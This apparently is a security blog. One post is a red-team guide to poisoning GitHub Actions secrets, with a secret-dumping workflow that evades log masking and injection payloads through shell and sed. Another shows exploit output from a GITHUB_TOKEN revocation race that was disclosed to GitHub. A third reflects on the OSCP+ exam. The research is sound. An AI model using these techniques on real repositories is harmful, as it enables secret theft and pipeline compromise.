GitHub Actions Secrets: Your New Favorite Red Team Primitive

  • Anyone with write access to a repo can overwrite any secret, including environment secrets protected by required reviewers
  • Passing secrets through environment variables only protects against shell injection, not YAML injection, jq injection, CRLF, or other downstream parsing issues
  • Use GitHub Actions secrets as a swiss army knife when attacking CI/CD pipelines. It makes detection and response much more challenging.

This post is a collaboration between myself and nopcorn

GitHub Actions secrets are encrypted variables designed to store sensitive information like API keys, tokens, and credentials. Their core premise is straightforward, once you set a secret its value is hidden from all GitHub interfaces. You cannot read it back through the UI, the CLI, or the API. Repository administrators can’t retrieve a secret’s plaintext value after it has been stored either. GitHub encrypts secrets using Libsodium sealed boxes before they even reach GitHub’s servers, and the values are only decrypted at runtime when injected into a workflow.

This sounds great. And to be fair, the encryption and access control mechanisms are solid. The problem isn’t with how secrets are stored, but rather with how they are used, who can modify them, and what the documentation doesn’t adequately warn defenders about.

The GitHub documentation on secrets has a few significant blind spots that, taken together, create real opportunities for attackers during red team engagements. Their design as un-auditable values also provide avenues for dodging defenders. This post will walk through some blind spots regarding secrets and how you can leverage them when attacking GitHub Actions.

Secrets for Shell Injection

GitHub’s security hardening guide states:

Any user with write access to your repository has read access to all secrets configured in your repository.

The docs are a bit misleading. Here “read access” means users with write access can list secrets names. But the statement undersells the actual risk. Users with write access can also overwrite secret values. The REST API for Actions secrets requires only collaborator access to create or update secrets, and the Using Secrets documentation confirms that you need write access to create secrets for an organization repository. This has been confirmed as intentional behavior by GitHub, and there is a long-standing docs issue about the confusing way this is documented.

In most organizations, write access is extremely common. Nearly every developer on a team has push permissions to at least some repositories. There is no separate permission for “can modify secrets” versus “can push code.” If you can push a branch, you can overwrite a secret.

The surprising part is that this applies to protected environment secrets too. You might assume that environments with required reviewers are protected from this kind of tampering. They are not. Required reviewers gate workflow execution only. The API endpoint for creating or updating environment secrets has the same permission requirement as repository secrets. No additional approval step, no reviewer notification. An attacker with write access can overwrite a production environment secret via gh secret set SECRET_NAME --env production, and the next time a legitimate deployment is approved by a reviewer, the poisoned value gets used.

If a workflow interpolates a secret directly into a run step, an attacker with write access can overwrite that secret with a value containing shell metacharacters and get arbitrary code running on the workflow runner.

The obvious problem is noise. Blindly overwriting a secret you don’t know the value of will almost certainly break the pipeline, trigger an investigation, and announce your presence. That might be acceptable for a smash-and-grab, but there will be consequences.

Consider this vulnerable workflow step:

- name: Deploy to production
  run: |
    echo "${{ secrets.SSH_PRIVATE_KEY }}" > /tmp/deploy_key
    chmod 600 /tmp/deploy_key
    ssh -i /tmp/deploy_key -o StrictHostKeyChecking=no deploy@prod.example.com "deploy_script.sh"

The direct interpolation of SSH_PRIVATE_KEY makes this vulnerable to shell injection. But to exploit it cleanly, we first need to know the secret’s current value so we can preserve it in our payload. That means we need to figure out where the secret lives: is it an organization secret, a repository secret, or an environment secret? The answer determines whether we can read the original value and whether we can override it at a different scope.

gh secret list --org <org>
gh secret list --repo <org>/<repo>
gh secret list --repo <org>/<repo> --env <env>

Assuming it is an organization secret, we can dump its value by pushing a throwaway workflow to a feature branch. Organization secrets are passed to all workflows in repositories that have access to them, regardless of whether any job explicitly references the secret by name.

# .github/workflows/malicious.yaml (pushed to a feature branch)
name: debug
on: push
jobs:
  dump:
    runs-on: ubuntu-latest
    steps:
      - name: nothing to see here
        run: echo '${{ toJSON(secrets) }}' | base64 | base64 # bypass log masking

This writes all available secrets to the workflow logs and bypasses GitHub’s secret masking. In a real engagement you would blend the workflow name and step names into something ordinary, and you would probably exfiltrate the values to a server you control rather than leaving them in the logs.

Now that you know the real value, you can exploit the secret context hierarchy to inject a poisoned value without disrupting other repositories. GitHub resolves secret name collisions using a fixed priority order: environment secrets take precedence over repository secrets, which take precedence over organization secrets. If the same secret name exists at multiple levels, the most specific scope wins.

This means you can shadow a broadly-scoped secret by creating one at a narrower scope. Set a repository-level secret with the same name as the organization secret, and only that repo picks up the poisoned value. Every other repo continues using the original. Delete the repository secret when you’re done and the organization secret takes effect again, with no trace at the organization level.

The same principle applies one level deeper. If a workflow uses environment secrets, you can shadow a repository secret by setting an environment secret with the same name. The workflow job that references that environment will use your value; jobs that don’t reference the environment will still see the original.

In this case, we set a repo secret to override the org secret and successfully take over the pipeline:

gh secret set SSH_PRIVATE_KEY --repo <org>/<repo> \
  --body "<real_SSH_PRIVATE_KEY_value>\" > /tmp/deploy_key; <injection payload>; #"

The pipeline still works. The SSH key is still valid. And your payload runs alongside it. When you are done, delete the repository secret and the original organization secret takes effect again.

Injection Beyond the Shell

Sure, just don’t write vulnerable workflows and you’re fine. Right?

GitHub has an entire dedicated page on script injections in the context of Actions workflows. It does a decent job of explaining how untrusted input from contexts like github.event.pull_request.title can lead to command injection when interpolated into run steps. The recommended mitigation is to pass values through environment variables rather than directly interpolating expressions. This is good advice. The shell treats the variable as a string, not as executable code.

But shell injection is not the only injection technique. Secrets get passed to all kinds of programs in a typical CI/CD pipeline, and many of those programs have their own interpretation of special characters. An environment variable stops the shell from expanding metacharacters. It does nothing to stop the receiving program from interpreting the secret’s contents in dangerous ways.

This shifts the attacker’s goal. Instead of exploiting a workflow that already exists, the aim is to get a workflow change merged that looks benign but is exploitable through a poisoned secret.

Consider a PR that adds a step like this:

- name: Add API key to local config
  env:
    API_KEY: ${{ secrets.API_KEY }}
  run: |
    sed "s/PLACEHOLDER_API_KEY/$API_KEY/" settings.conf

This looks fine. The secret is loaded as an environment variable, so shell injection is off the table. It uses sed to drop a sensitive API key into a settings file. A reviewer who has read GitHub’s guidance on secrets will see the env block, nod approvingly, and hit approve.

The problem is that sed has its own injection surface. The e flag causes sed to execute the contents of the pattern space as a shell command. A poisoned secret like:

gh secret set API_KEY --body "<actual_api_key>/;e (cmd1 && cmd2) > /dev/null;#"

will cause the sed command to execute cmd1 and cmd2 on the runner without breaking the pipeline, assuming you were able to leak the original secret value as described earlier. The API key still ends up in the config file. The build still passes.

A reviewer would need to be intimately familiar with the parsing behavior of every program that touches a secret to catch something like this. Realistically, nobody outside of offensive security is thinking about sed command execution flags during code review. The combination of opaque secret values and non-obvious injection surfaces makes this a reliable way to slip malicious workflow changes past a reviewer who is doing everything GitHub tells them to do.

A Note on Disclosure

All of the techniques in this post rely on documented, intentional behavior. Write access allowing secret modification is confirmed as by-design. Direct interpolation of secrets into shell commands is possible by design (the docs recommend against it, but do not prevent it). Secret values being opaque and unauditable is the entire point of the feature. There is nothing here to disclose to GitHub, because none of it is a bug. It is the logical consequence of design decisions that are individually reasonable but collectively create a trust model that attackers can exploit.

Takeaways

GitHub Actions secrets do exactly what they promise: they store values securely and prevent them from being read back through GitHub’s interfaces. The encryption is real, the access controls work as documented, and the log redaction is a thoughtful defense-in-depth measure.

The problem is that these same properties create assumptions. Developers assume that because a value comes from an encrypted store, it is safe to interpolate and requires higher permissions to modify. Reviewers assume that because they have followed GitHub’s guidance, non-shell-based injection isn’t something to worry about. And everyone assumes that environment protection rules protect the environment’s secrets from tampering, when they only protect against unauthorized consumption.

None of these assumptions hold up under adversarial pressure. For red teamers, secrets are a versatile tool that provides injection vectors, social engineering aids for bypassing code review, and an invisible storage mechanism for payloads.

GITHUB_TOKEN isn’t that Ephemeral

  • GITHUB_TOKEN is an ephemeral (cough) API key used for workflows to authenticate to the Github API
  • If you leak the token and make it available prior to the end of the workflow run, bad things can happen
  • Github states that the token is destroyed at the end of a workflow run, but it isn’t immediately invalidated
  • You can race Github’s invalidation process for fun and profit

Every time a GitHub Actions workflow is triggered, GitHub automatically provisions a token called GITHUB_TOKEN. This ephemeral credential allows jobs in the workflow to authenticate to the GitHub API without requiring manually managed secrets or personal access tokens. The token is injected into the workflow environment and is scoped to the repository context in which the workflow is running.

GITHUB_TOKENs can have multiple different default permission sets though these permissions can be customized within the workflow or job itself. Job-level scoping is prefered as it gives fine-grained control over access.

Dude where’s my token

Despite the ephemeral nature of GITHUB_TOKEN, misuse or mishandling during the workflow execution window can expose projects to significant risk. Many teams assume that temporary credentials are inherently safe, but this assumption breaks down in environments where artifacts, logs, or third-party actions introduce uncontrolled surfaces.

One of the most overlooked issues with GITHUB_TOKENs comes from a subtle behavior in actions/upload-artifact@v4. In this version, artifacts become downloadable as soon as they’re uploaded, even if the workflow that created them is still running. This creates a narrow but potent attack window: if the artifact contains a copy of the GITHUB_TOKEN, an attacker can retrieve it and execute arbitrary API calls in the context of the job until the workflow terminates.

That said, most workflows that upload artifacts tend to do it at the very end. So, in theory, there shouldn’t be much of a window for an attacker to abuse the GITHUB_TOKEN, right? The workflow usually wraps up right after the upload, which should invalidate the token almost immediately. Right? Right!?

Use after free (ish)

While the official documentation states that the GITHUB_TOKEN is revoked immediately after the workflow ends, we discovered that this isn’t strictly true…

Chris Pratt Surprised Meme Generator - Imgflip

During a series of tests conducted in collaboration with my research partner nopcorn, we observed that the token often remains valid for a short period (typically between one and two seconds) after the workflow reports as completed. In other words, the revocation process is not instantaneous. This creates a brief but real post-execution window during which a previously retrieved token can still be used to interact with the GitHub API.

We confirmed the racing by setting up a dummy vulnerable workflow in nopcorn/artifact-exploit-poc that would purposefully write the GITHUB_TOKEN to an artifact using actions/upload-artifact@v4. We then used a script to manually kick off the workflow, monitor for the artifact, download it, extract the value of GITHUB_TOKEN, and use it to authenticate to the Github API out of band for as long as it was valid. Afterwards we compared timestamps:

$ python exploit.py --repo nopcorn/artifact-exploit-poc --polling-interval 0.5
[*] Manually triggering the workflow to start...
[*] Waiting for the workflow run to be detected...
[+] Active workflow run found! Run ID: 15263730946, Status: queued
[*] Waiting for run 15263730946 for artifact 'secret-file'...
[*] Downloading artifact secret-file...
[+] Successfully extracted GITHUB_TOKEN from the artifact -> ghs_PsmNtQuBpes3u9x8MxQx22gE6C7Oc42QTsLj
[+] Monitoring GITHUB_TOKEN validity...
[+] 2025-05-27T00:01:42.289469Z: Valid GITHUB_TOKEN! (status code 200)
[+] 2025-05-27T00:01:42.980345Z: Valid GITHUB_TOKEN! (status code 200)
[+] 2025-05-27T00:01:43.668557Z: Valid GITHUB_TOKEN! (status code 200)
[+] 2025-05-27T00:01:44.360745Z: Valid GITHUB_TOKEN! (status code 200)
[+] 2025-05-27T00:01:45.023419Z: Valid GITHUB_TOKEN! (status code 200)
[+] 2025-05-27T00:01:45.688257Z: Valid GITHUB_TOKEN! (status code 200)
[+] 2025-05-27T00:01:46.353344Z: Valid GITHUB_TOKEN! (status code 200)
[+] 2025-05-27T00:01:47.046626Z: Valid GITHUB_TOKEN! (status code 200)
[+] 2025-05-27T00:01:47.754317Z: Valid GITHUB_TOKEN! (status code 200)
[!] 2025-05-27T00:01:48.423765Z: Invalid GITHUB_TOKEN: Bad credentials

If we take a look at the raw run logs for the workflow, you can see the workflow ends around 2025-05-27T00:01:46, but we’re able to successfully use the GITHUB_TOKEN until at least 2025-05-27T00:01:47 – a whole second later. While this doesn’t seem like a lot there are several techniques a threat actor could use to compromise a repository with only a single API call.

While this is a contrived example, a scan of all Github repositories using SourceGraph proves this is more common than you might think.

Disclosure

We responsibly disclosed this finding to GitHub through their vulnerability reporting program on HackerOne. The issue was triaged and investigated over the course of a month. Ultimately, however, GitHub classified the behavior as “informational” and chose not to pursue it further. Their position was that since the token is eventually revoked, the brief extension does not constitute a vulnerability under their current threat model.

While we respect their decision, it underscores a philosophical gap between how ephemeral secrets are documented and how they behave in practice. For red teamers, this matters. If you can automate artifact retrieval and parse secrets before the revocation race completes, you have a viable short-term credential to pivot or persist.

We approached many of the vulnerable projects we identified during our scans (via bug bounty programs and Github Security disclosures) and we’re happy to say that the vast majority of them were receptive to the exploit vector and promptly fixed their vulnerable repositories.

References

https://unit42.paloaltonetworks.com/github-repo-artifacts-leak-tokens – ArtiPACKED: Hacking Giants Through a Race Condition in GitHub Actions Artifacts

https://www.praetorian.com/blog/codeqleaked-public-secrets-exposure-leads-to-supply-chain-attack-on-github-codeql/ – CodeQLEAKED – Public Secrets Exposure Leads to Supply Chain Attack on GitHub CodeQL

Assume Breach, Not Burnout: The New OSCP+ Experience

Like many in the cybersecurity community, I once viewed the OSCP certification as the gatekeeper to many offensive security roles. But for me, it was more than a technical exam—it became a recurring roadblock. I failed the older version of the OSCP twice, before finally getting it with a bit of luck. When the OSCP+ was released, I thought i would attempt as I wanted to see if I was up for “more realistic” challenge.

I’m sharing this story because something changed recently. Offensive Security released the revamped OSCP+, and after diving into this new version, I found something that finally clicked. Here’s what’s different—and why it made all the difference for me.

Enter OSCP+: A Modernized, Realistic Challenge

Coming from a red teaming background, I’ve spent alot of time inside Active Directory environments, abusing domain misconfigurations, and simulating adversarial behavior across enterprise networks.

Trying Harder

So when I first attempted the original OSCP, I expected a challenge—but not one so disconnected from my daily work. The exam and lab environments were overwhelmingly web-heavy, with a strong emphasis on outdated Linux boxes and classic web application vulnerabilities.

More Windows, More Realism

One of the biggest changes was the increased number of Windows machines, especially in the lab and exam environments. In the real world, most of what I see revolves around Windows and Active Directory—not outdated Linux web servers vulnerable to simple exploits. The OSCP+ lab now reflects this reality.

This shift made all the difference for me. Tools like PowerView, BloodHound, and Mimikatz were not the focus and were central to the experience. Finally, the skills I use in real engagements were the same ones I needed to succeed in the exam

Assumed Breach for Active Directory

Another welcome surprise: the Active Directory section starts with an assumed breach. Instead of spending half the exam time just trying to land a basic foothold, I was dropped into a compromised workstation within a corporate domain.

This approach let me focus on lateral movement, privilege escalation, and domain dominance—more like the average network pentesting assessment. It also made the exam more strategic and realistic, instead of being a time sink filled with outdated enumeration.

No Bonus Points, No Gimmicks

One of the most notable changes in the OSCP+ exam is the updated point structure.

In the older version of OSCP, there were bonus points. If you completed a certain number of exercises and lab machines from the course material, you could earn up to 10 extra points on the exam. In theory, it encouraged people to take shortcuts and only complete the required number of exercises and lab machines.

With OSCP+, bonus points are gone, you know exactly what’s needed to pass. Instead of banking on a few extra points, the focus is on demonstrating real-world offensive skills during the exam itself. It shifts the mindset from “padding my score” to “executing a plan.”

What I Did Differently

With OSCP+, I trained like I was prepping for a real engagement:

  • Completed EVERY SINGLE PWK exercise and practise machine
  • Mapped out attack paths across multi-host Windows environments with BloodHound
  • Practiced using NetExec, the all in one tool to Kerberoast, Password Spray, do domain enumeration and pretty much everything else

Final Thoughts: It’s Still Hard, But It’s Fair

To be clear, OSCP+ is no walk in the park. It still demands hours of focused practice, deep technical knowledge, and solid methodology. But the difference now is that the challenge aligns with reality.

If you’ve struggled with the old OSCP—especially if you’re coming from a Windows-heavy or red team background—don’t give up. The new OSCP+ might be exactly what you need.